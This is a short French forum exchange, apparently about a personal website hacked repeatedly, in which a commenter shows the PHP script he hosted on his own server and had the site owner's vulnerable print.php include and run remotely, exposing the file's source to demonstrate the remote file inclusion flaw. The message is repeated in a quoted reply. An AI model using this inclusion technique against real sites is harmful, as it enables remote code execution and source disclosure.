C'est simple, mon pc perso n'execute pas php donc je me suis fait un script php sur mon serveur apache contenant :
<?php
$fp=fopen("./print.php","r");
while (!feof($fp))
{
$tmp=fgets($fp,4096);
$tmp=str_replace("<","<",$tmp);
echo "$tmp";
}
fclose($fp);
?>
et je l'ai lancé comme dit précédemment avec l'ip de mon pc et le nom du script sans .php comme ca il a été executé dans ton fichier print.php
Donc j'ai utilisé ta faille pour te l'exposer :)
S'il y a un problème, il y a une solution; s'il n'y a pas de solution, c'est qu'il n'y a pas de problème.
[^] # Re: s/hacker/script kiddy/
Posté par Olivier Esver (site web personnel) . En réponse au journal site perso hacké à plusieurs reprises. Évalué à 5.
<?php
$fp=fopen("./print.php","r");
while (!feof($fp))
{
$tmp=fgets($fp,4096);
$tmp=str_replace("<","<",$tmp);
echo "$tmp";
}
fclose($fp);
?>
et je l'ai lancé comme dit précédemment avec l'ip de mon pc et le nom du script sans .php comme ca il a été executé dans ton fichier print.php
Donc j'ai utilisé ta faille pour te l'exposer :)
S'il y a un problème, il y a une solution; s'il n'y a pas de solution, c'est qu'il n'y a pas de problème.